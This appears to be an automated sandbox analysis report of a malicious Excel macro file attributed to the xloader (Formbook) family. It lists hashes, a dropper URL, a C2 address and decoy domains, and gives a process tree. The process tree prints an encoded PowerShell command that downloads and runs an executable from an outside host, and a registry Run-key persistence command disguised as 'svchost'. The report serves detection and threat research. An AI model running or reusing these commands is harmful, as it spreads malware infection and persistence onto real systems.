xloader | bdad87cc1c4683be3d1a173ac533eb8322ab725e055535c3288b33ac64373ea6

General

Target

Machine Specifications.xlsm
Size

148KB
MD5

9ce6349baf1276836ea9764233aa09ae
SHA1

0d5349b1e57866a0111d6ec731d21e9cf151a6dd
SHA256

bdad87cc1c4683be3d1a173ac533eb8322ab725e055535c3288b33ac64373ea6
SHA512

b88b6946764199c0c33a02fb02a35d96dea5c30ad01d70b0afdbacd5bae7198ef9ee5722b35cba562daae7ac6c813358082f6fd4c85ee2c2e66b7d6452c29618

Score

10^/10

xloader loader persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfer.sh/get/D8sXG/text.exe

Extracted

Family

xloader

C2

http://www.dubainights.net/rrrq/

Decoy

sdlcutps.com

novieffendi.com

highpointedu.com

sagaming.today

charlottesteer.com

kilopapa.net

prime-executive.com

8893270.com

gorillaikka.com

coynesgastropub.com

sun9376.xyz

coolkilo.com

1clickdoc.online

fosa.info

smileburgerdelivery.com

ronpaulmessge17.com

sqwigs.com

xn--c1ajbkdnb9b0g.xn--p1acf

gelzers.info

banpluspay.com

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3044	728	cmd.exe	EXCEL.EXE

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3176-47-0x0000000000400000-0x0000000000428000-memory.dmp	xloader
behavioral2/memory/3176-48-0x000000000041CFC0-mapping.dmp	xloader
behavioral2/memory/684-56-0x0000000000930000-0x0000000000958000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

24 1908 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

fDHPa.exeDriver auto update.exeAddInProcess32.exe

pid process

648 fDHPa.exe
1968 Driver auto update.exe
3176 AddInProcess32.exe

flow	pid	process
24	1908	powershell.exe

pid	process
648	fDHPa.exe
1968	Driver auto update.exe
3176	AddInProcess32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\Driver auto update.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Driver auto update.exeAddInProcess32.exeraserver.exe

description	pid	process	target process
PID 1968 set thread context of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 3176 set thread context of 2968	3176	AddInProcess32.exe	Explorer.EXE
PID 684 set thread context of 2968	684	raserver.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

728 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exefDHPa.exeDriver auto update.exeAddInProcess32.exeraserver.exe

pid	process
1908	powershell.exe
1908	powershell.exe
1908	powershell.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
648	fDHPa.exe
1968	Driver auto update.exe
1968	Driver auto update.exe
3176	AddInProcess32.exe
3176	AddInProcess32.exe
3176	AddInProcess32.exe
3176	AddInProcess32.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe
684	raserver.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

AddInProcess32.exeraserver.exe

pid process

3176 AddInProcess32.exe
3176 AddInProcess32.exe
3176 AddInProcess32.exe
684 raserver.exe
684 raserver.exe

pid	process
3176	AddInProcess32.exe
3176	AddInProcess32.exe
3176	AddInProcess32.exe
684	raserver.exe
684	raserver.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exefDHPa.exeDriver auto update.exeAddInProcess32.exeraserver.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	648	fDHPa.exe
Token: SeDebugPrivilege	1968	Driver auto update.exe
Token: SeDebugPrivilege	3176	AddInProcess32.exe
Token: SeDebugPrivilege	684	raserver.exe
Token: SeShutdownPrivilege	2968	Explorer.EXE
Token: SeCreatePagefilePrivilege	2968	Explorer.EXE
Token: SeShutdownPrivilege	2968	Explorer.EXE
Token: SeCreatePagefilePrivilege	2968	Explorer.EXE

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE
728	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exefDHPa.execmd.exeDriver auto update.exeExplorer.EXEraserver.exe

description	pid	process	target process
PID 728 wrote to memory of 3044	728	EXCEL.EXE	cmd.exe
PID 728 wrote to memory of 3044	728	EXCEL.EXE	cmd.exe
PID 3044 wrote to memory of 1908	3044	cmd.exe	powershell.exe
PID 3044 wrote to memory of 1908	3044	cmd.exe	powershell.exe
PID 1908 wrote to memory of 648	1908	powershell.exe	fDHPa.exe
PID 1908 wrote to memory of 648	1908	powershell.exe	fDHPa.exe
PID 1908 wrote to memory of 648	1908	powershell.exe	fDHPa.exe
PID 648 wrote to memory of 1908	648	fDHPa.exe	cmd.exe
PID 648 wrote to memory of 1908	648	fDHPa.exe	cmd.exe
PID 648 wrote to memory of 1908	648	fDHPa.exe	cmd.exe
PID 1908 wrote to memory of 1096	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 1096	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 1096	1908	cmd.exe	reg.exe
PID 648 wrote to memory of 1968	648	fDHPa.exe	Driver auto update.exe
PID 648 wrote to memory of 1968	648	fDHPa.exe	Driver auto update.exe
PID 648 wrote to memory of 1968	648	fDHPa.exe	Driver auto update.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 1968 wrote to memory of 3176	1968	Driver auto update.exe	AddInProcess32.exe
PID 2968 wrote to memory of 684	2968	Explorer.EXE	raserver.exe
PID 2968 wrote to memory of 684	2968	Explorer.EXE	raserver.exe
PID 2968 wrote to memory of 684	2968	Explorer.EXE	raserver.exe
PID 684 wrote to memory of 2304	684	raserver.exe	cmd.exe
PID 684 wrote to memory of 2304	684	raserver.exe	cmd.exe
PID 684 wrote to memory of 2304	684	raserver.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Machine Specifications.xlsm"
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\SYSTEM32\cmd.exe
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBEADgAcwBYAEcALwB0AGUAeAB0AC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXABmAEQASABQAGEALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAyADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABmAEQASABQAGEALgBlAHgAZQA=
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBEADgAcwBYAEcALwB0AGUAeAB0AC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXABmAEQASABQAGEALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAyADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABmAEQASABQAGEALgBlAHgAZQA=
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908

C:\Users\Admin\AppData\Roaming\fDHPa.exe
"C:\Users\Admin\AppData\Roaming\fDHPa.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svchost" /t REG_SZ /d "C:\Users\Admin\Driver auto update.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svchost" /t REG_SZ /d "C:\Users\Admin\Driver auto update.exe"
7⤵
- Adds Run key to start application
PID:1096

C:\Users\Admin\Driver auto update.exe
"C:\Users\Admin\Driver auto update.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\SysWOW64\raserver.exe
"C:\Windows\SysWOW64\raserver.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
3⤵
PID:2304

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
C:\Users\Admin\AppData\Roaming\fDHPa.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\AppData\Roaming\fDHPa.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\Driver auto update.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\Driver auto update.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
memory/648-21-0x00000000055C0000-0x00000000055C1000-memory.dmp

Filesize
4KB

Download
memory/648-25-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/648-30-0x0000000004FE1000-0x0000000004FE2000-memory.dmp

Filesize
4KB

Download
memory/648-27-0x0000000006E70000-0x0000000006E9F000-memory.dmp

Filesize
188KB

Download
memory/648-24-0x00000000054B0000-0x00000000054B1000-memory.dmp

Filesize
4KB

Download
memory/648-23-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/648-22-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/648-15-0x0000000000000000-mapping.dmp

Download
memory/648-19-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/648-18-0x00000000730E0000-0x00000000737CE000-memory.dmp

Filesize
6.9MB

Download
memory/684-60-0x00000000048C0000-0x000000000494F000-memory.dmp

Filesize
572KB

Download
memory/684-54-0x0000000000000000-mapping.dmp

Download
memory/684-59-0x0000000004A10000-0x0000000004D30000-memory.dmp

Filesize
3.1MB

Download
memory/684-55-0x0000000000EE0000-0x0000000000EFF000-memory.dmp

Filesize
124KB

Download
memory/684-56-0x0000000000930000-0x0000000000958000-memory.dmp

Filesize
160KB

Download
memory/728-4-0x00007FF97B640000-0x00007FF97B650000-memory.dmp

Filesize
64KB

Download
memory/728-5-0x00007FF97B640000-0x00007FF97B650000-memory.dmp

Filesize
64KB

Download
memory/728-3-0x00007FF97B640000-0x00007FF97B650000-memory.dmp

Filesize
64KB

Download
memory/728-6-0x00007FF99EBC0000-0x00007FF99F1F7000-memory.dmp

Filesize
6.2MB

Download
memory/728-2-0x00007FF97B640000-0x00007FF97B650000-memory.dmp

Filesize
64KB

Download
memory/1096-29-0x0000000000000000-mapping.dmp

Download
memory/1908-28-0x0000000000000000-mapping.dmp

Download
memory/1908-13-0x0000026B56780000-0x0000026B56781000-memory.dmp

Filesize
4KB

Download
memory/1908-14-0x0000026B56516000-0x0000026B56518000-memory.dmp

Filesize
8KB

Download
memory/1908-8-0x0000000000000000-mapping.dmp

Download
memory/1908-9-0x00007FF9965C0000-0x00007FF996FAC000-memory.dmp

Filesize
9.9MB

Download
memory/1908-10-0x0000026B56510000-0x0000026B56512000-memory.dmp

Filesize
8KB

Download
memory/1908-11-0x0000026B56513000-0x0000026B56515000-memory.dmp

Filesize
8KB

Download
memory/1908-12-0x0000026B3E200000-0x0000026B3E201000-memory.dmp

Filesize
4KB

Download
memory/1968-45-0x0000000006680000-0x000000000668B000-memory.dmp

Filesize
44KB

Download
memory/1968-46-0x00000000066A0000-0x00000000066A1000-memory.dmp

Filesize
4KB

Download
memory/1968-34-0x00000000730E0000-0x00000000737CE000-memory.dmp

Filesize
6.9MB

Download
memory/1968-42-0x00000000055B0000-0x00000000055B1000-memory.dmp

Filesize
4KB

Download
memory/1968-44-0x00000000055B1000-0x00000000055B2000-memory.dmp

Filesize
4KB

Download
memory/1968-31-0x0000000000000000-mapping.dmp

Download
memory/2304-58-0x0000000000000000-mapping.dmp

Download
memory/2968-53-0x0000000005AC0000-0x0000000005C57000-memory.dmp

Filesize
1.6MB

Download
memory/2968-61-0x00000000025C0000-0x00000000026AF000-memory.dmp

Filesize
956KB

Download
memory/3044-7-0x0000000000000000-mapping.dmp

Download
memory/3176-52-0x0000000001670000-0x0000000001680000-memory.dmp

Filesize
64KB

Download
memory/3176-51-0x0000000001690000-0x00000000019B0000-memory.dmp

Filesize
3.1MB

Download
memory/3176-48-0x000000000041CFC0-mapping.dmp

Download
memory/3176-47-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads